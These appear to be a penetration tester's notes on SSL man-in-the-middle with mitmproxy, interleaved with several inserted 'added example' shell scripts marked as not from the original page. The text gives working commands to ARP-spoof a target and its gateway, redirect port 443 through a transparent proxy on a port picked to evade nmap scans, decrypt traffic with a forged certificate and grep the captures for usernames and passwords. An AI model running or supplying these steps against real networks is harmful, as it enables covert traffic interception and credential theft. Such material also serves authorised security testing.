SSL MITM WITH MITMPROXY

BINARY INSTALL

apt install mitmproxy
dpkg -l | grep mitm

e.g.

2.0.2-3

FROM SCRATCH

apt install python3 python3-venv
#python3-pip

git clone https://github.com/mitmproxy/mitmproxy.git
cd mitmproxy/

./dev.sh
. venv/bin/activate
mitmproxy --version

e.g.

Mitmproxy: 3.0.0.dev1223 (commit 1d23d50) 
Python:    3.6.4
OpenSSL:   OpenSSL 1.1.0g  2 Nov 2017
Platform:  Linux-4.16.0-rc2-x86_64-Intel-R-_Core-TM-_i5-7400_CPU_@_3.00GHz-with-slackware-14.2

Mitmproxy: 5.0.0.dev (+237, commit 8353f4a)
Python:    3.6.7
OpenSSL:   OpenSSL 1.1.0j  20 Nov 2018
Platform:  Linux-4.15.0-47-generic-x86_64-with-Ubuntu-18.04-bionic

SELF-SIGNED

ideally you get a true cert for the domain (key and full chain concatenated into one PEM, the .concat.pem used further down), but a self-signed one is enough for a PoC as long as the client accepts the certificate warning it triggers

domain=FQDN
target=x.x.x.x

#openssl s_client -servername $domain -connect $target:443 </dev/null

cd /root/certs/
openssl req -x509 -newkey rsa:2048 -nodes -keyout ${domain%%\.*}.self.key -out ${domain%%\.*}.self.cer -subj /CN=$domain
cat ${domain%%\.*}.self.cer ${domain%%\.*}.self.key > ${domain%%\.*}.self.pem
chmod 400 ${domain%%\.*}.self.cer ${domain%%\.*}.self.key ${domain%%\.*}.self.pem
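As an added example that is not from the page, the same self-signed generation wrapped in a function, plus the check a practitioner wants before handing the bundle to --certs: that the private key in the PEM really belongs to the certificate in front of it (a wrong key or a botched concatenation is the usual reason mitmproxy refuses to serve). It assumes the openssl CLI, a writable output directory and keeps the page's ${domain%%.*}.self naming.

```shell
#!/bin/sh
# Added example: build the self-signed PEM bundle for --certs and verify it.
# Assumes the openssl CLI; the page's naming (${domain%%.*}.self.*) is kept.

make_selfsigned_bundle() {
    # usage: make_selfsigned_bundle FQDN OUTDIR [DAYS]  -> prints the bundle path
    domain=$1; outdir=$2; days=${3:-365}
    base="$outdir/${domain%%.*}.self"
    mkdir -p "$outdir" || return 1
    # -nodes: unencrypted key so the proxy can load it without a passphrase;
    # -days is explicit because openssl req -x509 otherwise defaults to 30 days
    openssl req -x509 -newkey rsa:2048 -nodes -days "$days" \
        -keyout "$base.key" -out "$base.cer" -subj "/CN=$domain" 2>/dev/null || return 1
    # certificate first, then the key: the bundle mitmproxy --certs will load
    cat "$base.cer" "$base.key" > "$base.pem" || return 1
    chmod 400 "$base.key" "$base.pem"
    printf '%s\n' "$base.pem"
}

bundle_is_consistent() {
    # usage: bundle_is_consistent FILE.pem
    # 0 when the certificate and the private key share the same RSA modulus,
    # i.e. the key really belongs to that cert; 1 otherwise (wrong key, bad concat)
    certmod=$(openssl x509 -in "$1" -noout -modulus 2>/dev/null) || return 1
    keymod=$(openssl rsa -in "$1" -noout -modulus 2>/dev/null) || return 1
    [ -n "$certmod" ] && [ "$certmod" = "$keymod" ]
}

bundle_cn() {
    # usage: bundle_cn FILE.pem -> prints the subject CN the proxy will present
    # (handles both the "CN = x" and the older "/CN=x" subject layouts)
    openssl x509 -in "$1" -noout -subject | sed 's/.*CN *= *//'
}
```

Run bundle_is_consistent on the real .concat.pem as well: cert and key coming from two different places is exactly where the mismatch happens.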

GATEWAY

mitmproxy listens on port 8080 by default, for both http and https. we want the REDIRECT target to be a port outside nmap's top 1000 (33231 below) so that a routine scan of the gateway does not reveal the proxy; whatever port you pick here has to be passed to mitmproxy/mitmdump with -p

sysctl -w net.ipv4.ip_forward=1
sysctl net.ipv4.ip_forward

echo 0 > /proc/sys/net/ipv4/conf/$netif/send_redirects
cat /proc/sys/net/ipv4/conf/$netif/send_redirects

echo $netif
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 33231
#-i $netif
iptables -L -n -t nat

all this while making sure the box itself has the appropriate gateway and resolvers configured, since whatever you proxy leaves through your own routing table
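As an added example that is not from the page, the gateway setup and its teardown as two shell functions (so the box is left clean once you are done), plus the check behind the port choice above: whether a port sits in nmap's default top-1000 tcp list, computed the way nmap builds it, from the open-frequency column of nmap-services. It assumes root for the sysctl/iptables part, GNU coreutils and awk, the nmap-services file at /usr/share/nmap/nmap-services, and the interface name and port are placeholders; the services excerpt inside is constructed with illustrative frequencies.

```shell
#!/bin/sh
# Added example: transparent gateway up/down and an nmap top-N port check.
# Assumes root for gateway_up/gateway_down, GNU coreutils/awk, and the
# nmap-services file shipped with nmap; interface and port are placeholders.

port_in_nmap_top() {
    # usage: port_in_nmap_top PORT [N] [NMAP_SERVICES_FILE]
    # nmap's default scan takes the N (1000) tcp ports with the highest
    # open-frequency column of nmap-services; returns 0 when PORT is among them
    port=$1
    n=${2:-1000}
    services=${3:-/usr/share/nmap/nmap-services}
    awk '$1 !~ /^#/ && $2 ~ /\/tcp$/ { split($2, a, "/"); print $3, a[1] }' "$services" \
        | sort -k1,1rn \
        | head -n "$n" \
        | awk '{ print $2 }' \
        | grep -qx -- "$port"
}

gateway_up() {
    # usage: gateway_up NETIF PORT   (root)
    netif=$1; port=$2
    sysctl -q -w net.ipv4.ip_forward=1
    # once we forward for the victim, never tell it about a "better" route
    echo 0 > "/proc/sys/net/ipv4/conf/$netif/send_redirects"
    echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects
    # only traffic entering on NETIF, so our own outbound 443 is not looped back
    iptables -t nat -A PREROUTING -i "$netif" -p tcp --dport 443 \
        -j REDIRECT --to-port "$port"
}

gateway_down() {
    # usage: gateway_down NETIF PORT   (root) - same rule, -D instead of -A
    netif=$1; port=$2
    iptables -t nat -D PREROUTING -i "$netif" -p tcp --dport 443 \
        -j REDIRECT --to-port "$port"
    sysctl -q -w net.ipv4.ip_forward=0
}

sample_nmap_services() {
    # constructed excerpt in nmap-services layout (name  port/proto  frequency);
    # frequencies are illustrative, the real file has about 20k lines
    f=$(mktemp)
    cat >"$f" <<'EOF'
# Fields: name  port/proto  open-frequency  # comment
http        80/tcp     0.484143  # World Wide Web HTTP
domain      53/udp     0.213496  # Domain Name Server
telnet      23/tcp     0.221265
https       443/tcp    0.208669  # secure http (SSL)
ftp         21/tcp     0.197667  # File Transfer [Control]
ssh         22/tcp     0.182286  # Secure Shell Login
http-proxy  8080/tcp   0.042052  # Common HTTP proxy/second web server port
EOF
    printf '%s\n' "$f"
}

# stand-alone: check the page's port against the real list when nmap is installed
if [ -r /usr/share/nmap/nmap-services ]; then
    if port_in_nmap_top 33231; then
        echo "33231 is IN nmap's top 1000 tcp ports, pick another"
    else
        echo "33231 is outside nmap's top 1000 tcp ports"
    fi
fi
```

The udp column is deliberately dropped: the default scan the page refers to is the tcp top 1000, and a udp-only entry with a high frequency must not push a tcp port out of the list.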

SSL MITM

start the proxy either with the TUI (which truly eats your memory; it also needs a UTF-8 locale, hence the LANG check)

echo $LANG
#export LANG=en_US.UTF-8
mitmproxy -h | less

# -p has to match the REDIRECT target port; for the self-signed PoC point --certs at ${domain%%\.*}.self.pem instead
mitmproxy -p 33231 --set block_global=false --mode transparent --showhost \
    --certs $domain=/root/certs/${domain%%\.*}.concat.pem \
    --set console_mouse=false

or headless with mitmdump, tcpdump style (writes the flows to a file)

mitmdump --version
mitmdump -h | less
mitmdump --options | less

ll /data/dumps/
date=`date +%s`

don’t ask me why we need an absolute path there

export SSLKEYLOGFILE="/data/dumps/$date.sslkeylogfile.txt"

now intercepting ONLY example.com and its subdomains (assuming you have a working, concatenated cert for it) and passing everything else through untouched. mind the double negative: --ignore-hosts lists what to pass through, so the two negative lookaheads keep example.com and bare IP destinations (what mitmproxy matches against when a connection carries no SNI) out of the ignore list, i.e. intercepted

echo $date $SSLKEYLOGFILE
mitmdump -p 33231 --set block_global=false --mode transparent --showhost \
    --ignore-hosts '^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.com:)' \
    --certs example.com=/root/certs/example.concat.pem \
    -w /data/dumps/$date.mitmdump --flow-detail 0
#  --ssl-insecure, -k    Do not verify upstream server SSL/TLS certificates.
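As an added example that is not from the page, a dry run of the --ignore-hosts pattern from the mitmdump command above against host:port strings, which is the form mitmproxy applies it to (the SNI or Host name when known, else the raw IP), so you can see what gets intercepted and what is passed through before putting anything on the wire. It assumes GNU grep with -P, whose lookaheads behave like those of Python's re module that mitmproxy uses; the sample connections are constructed.

```shell
#!/bin/sh
# Added example: dry-run the --ignore-hosts regex against host:port strings.
# Assumes GNU grep -P (PCRE); mitmproxy itself evaluates the pattern with
# Python's re.search against "host:port", which these calls mirror.

IGNORE_RE='^(?![0-9\.]+:)(?!([^\.:]+\.)*example\.com:)'

intercepted() {
    # usage: intercepted HOST:PORT
    # --ignore-hosts passes through whatever the regex MATCHES, so a connection
    # is intercepted exactly when the regex does not match its host:port
    if printf '%s\n' "$1" | grep -qP "$IGNORE_RE"; then
        return 1      # on the ignore list: passed through untouched
    else
        return 0      # not ignored: mitmproxy terminates TLS here
    fi
}

verdict() {
    # usage: verdict HOST:PORT -> prints "intercept" or "passthrough"
    if intercepted "$1"; then echo intercept; else echo passthrough; fi
}

# constructed sample connections, including the two look-alikes that must NOT
# be intercepted: a host merely ending in "example.com" and example.com used as
# a prefix of some other domain
for hp in example.com:443 www.example.com:443 10.0.0.5:443 \
          www.google.com:443 notexample.com:443 example.com.evil.net:443; do
    printf '%-28s %s\n' "$hp" "$(verdict "$hp")"
done
```

The IP clause matters in transparent mode: a client that sends no SNI shows up as 1.2.3.4:443, and without the first lookahead it would be silently passed through while you assume you are sniffing it.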

ARP SPOOF

poison $target and $peer in both directions (-r), e.g. a client and its gateway, or the server and its gateway, so that the 443 traffic between them crosses our box and hits the REDIRECT rule

echo $netif $target $peer
arpspoof -i $netif -t $target -r $peer

L00T

netstat -lntup
cd /data/dumps/
# adjust the field names to the target's login form
grep -a UserName $date.mitmdump
grep -a Password $date.mitmdump

FINE TUNE

refine your filter offline against the saved flows (-n: do not start a proxy, -r: read the flow file, then a filter expression)

cd /data/dumps/
mitmdump -nr $date.mitmdump "~m get"
mitmdump -nr $date.mitmdump "~m post"

RESOURCES

mitmproxy

Wireshark and SSL/TLS Master Secrets https://docs.mitmproxy.org/stable/howto-wireshark-tls/

Transparent Proxy https://docs.mitmproxy.org/stable/concepts-modes/#transparent-proxy

Transparent Proxying https://mitmproxy.readthedocs.io/en/v2.0.2/transparent.html

Mitmproxy Core Features https://docs.mitmproxy.org/stable/overview-features/

How To: Use mitmproxy to read and modify HTTPS traffic https://blog.heckel.xyz/2013/07/01/how-to-use-mitmproxy-to-read-and-modify-https-traffic-of-your-phone/

ignore domains

Ignoring Domains https://docs.mitmproxy.org/master/howto-ignoredomains/

Ignore Domains https://mitmproxy.readthedocs.io/en/v2.0.2/features/passthrough.html

Ignor regex exclude not working #3013 https://github.com/mitmproxy/mitmproxy/issues/3013

fine tune

mitmdump https://mitmproxy.readthedocs.io/en/v2.0.2/mitmdump.html

Filter expressions https://mitmproxy.readthedocs.io/en/v2.0.2/features/filters.html

nmap

Top 1,000 TCP and UDP ports (nmap default) https://nullsec.us/top-1-000-tcp-and-udp-ports-nmap-default/

Port Selection Data and Strategies https://nmap.org/book/performance-port-selection.html

SecLists/Discovery/Infrastructure/nmap-top1000-ports.txt https://github.com/danielmiessler/SecLists/blob/master/Discovery/Infrastructure/nmap-top1000-ports.txt
